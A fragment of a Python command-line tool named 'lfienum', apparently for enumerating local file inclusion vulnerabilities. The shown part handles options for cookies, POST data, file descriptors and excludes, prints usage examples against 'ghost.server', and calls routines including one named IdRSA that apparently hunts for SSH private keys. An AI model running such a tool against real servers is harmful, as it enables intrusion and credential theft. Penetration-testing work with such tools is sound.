        print ('python3 lfienum "http://ghost.server/index.php?page=" --fd 9')
        exit(1)		
    if argument == '--cookie-mode':
      global cookie_mode
      global cookie
      cookie_mode = True
      n = arguments_list.index(argument)+1
      try:
        cookie = arguments_list[n]
      except IndexError:
        print ("cookie usage example:")
        print ("python3 lfienum http://ghost.server/index.php --cookie-mode 'session'")
        exit(1)		
    if argument == '--data-mode':
      global data_mode
      global data
      data_mode = True
      n = arguments_list.index(argument)+1
      try:
        data = arguments_list[n]
      except IndexError:
        print ("data usage example:")
        print ("python3 lfienum http://ghost.server/index.php -X POST --data-mode 'file'")
        exit(1)				
    if argument == '--exclude':
      global blacklist
      n = arguments_list.index(argument)+1
      try:			
        blacklist = arguments_list[n]
      except IndexError:
        print ("exclude usage example:")
        print ("python3 lfienum http://ghost.server/index.php --exclude 'File not found.'")
        exit(1)
				
  if '--data-mode' in sys.argv and not '-X' in sys.argv:
    request = requests.post
    				
  if wordlist is not None:
    Wordlist()
  if pid is not None:
    PID()
  if pids is not None:
    PIDS()
  if wrapper is not None:
    Wrapper()
  if key is not None:
    IdRSA()
  if fd is not None:
    FD(fd)
	
  if 'http' in sys.argv[1] and not '--pids' in sys.argv and not '--pid' in sys.argv and not '--fd' in sys.argv and not '--wrapper' in sys.argv and not '-w' in sys.argv and not '--wordlist' in sys.argv and not '-k' in sys.argv and not '--key' in sys.argv:

    prior_wordlist,later_wordlist = CheckCon()
    Enum(prior_wordlist,later_wordlist)
    IdRSA()

CheckCon()
Main()
